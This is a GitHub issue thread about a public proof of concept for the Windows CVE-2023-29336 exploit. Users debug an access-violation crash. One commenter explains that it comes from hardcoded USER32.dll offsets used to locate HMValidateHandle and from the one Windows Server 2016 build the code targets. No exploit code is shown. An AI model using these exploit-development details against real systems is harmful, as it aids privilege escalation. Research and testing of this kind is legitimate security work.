VulnerabilityPoC icon indicating copy to clipboard operation
VulnerabilityPoC copied to clipboard

Published 20 hours ago verified publisher icon numencyber

Runtime Error with CVE-2023-29336 PoC On Windows 2016 Standard

Open gwillcox-r7 opened this issue 1 year ago • 4 comments

When running the PoC on a fresh Windows 2016 updated with Feb 2018 patches, I keep getting the following error when trying to run the PoC via a Visual Studio 2022 project:

Exception thrown at <address> in CVE-2023-29336.exe: 0xC00000005: Access violation reading location 0xFFFFFFFFFFFFFFFF

Yet looking at where add is I see its a variable that is seemingly pointing to invalid memory that cannot be read from:

image

gwillcox-r7 avatar Jun 09 '23 18:06 gwillcox-r7

Upon further inspection this is likely being caused by the fact that hardcoded offsets into USER32.dll are being used and I'm guessing 0xbd688 isn't right for Windows Server 2016 EN_US edition. Its possible this might be different on a Chinese or Singaporean system which would explain why this code might work on the author's PC but not on a US system due to strings being encoded in different languages which might end up changing the offset location, or it might be that I'm simply using a different patch version of USER32.dll where a minor update to the code shifted the offset location. In any case I imagine this file could be subject to change from a few angles, will dig deeper and see what I can find.

gwillcox-r7 avatar Jun 12 '23 21:06 gwillcox-r7

Looks like this was designed to be getting the address of HMValidateHandle using a common technique, though the use of a hardcoded address vs checking for specific bytes is a bit different than what I've seen in the past. In reality in my copy the address of IsMenu is at 0x180012b10 whilst the address of HMValidateHandle is at 0x180012100. So HMValidateHandle is actually earlier on in the code, not later on in the code like the code appears to be trying to do.

gwillcox-r7 avatar Jun 12 '23 22:06 gwillcox-r7

Okay so turns out the PoC is only designed to work on 14393.rs1_release.230329-2152 and I was testing on 14393.rs1_release.161220-1747 from what I can tell, which explains the differences.

gwillcox-r7 avatar Jun 13 '23 21:06 gwillcox-r7

When running the PoC on a fresh Windows 2016 updated with Feb 2018 patches, I keep getting the following error when trying to run the PoC via a Visual Studio 2022 project:

Exception thrown at <address> in CVE-2023-29336.exe: 0xC00000005: Access violation reading location 0xFFFFFFFFFFFFFFFF

Yet looking at where add is I see its a variable that is seemingly pointing to invalid memory that cannot be read from:

image

also encountered this problem. And,have you solved it?

leexuan avatar Jul 17 '23 13:07 leexuan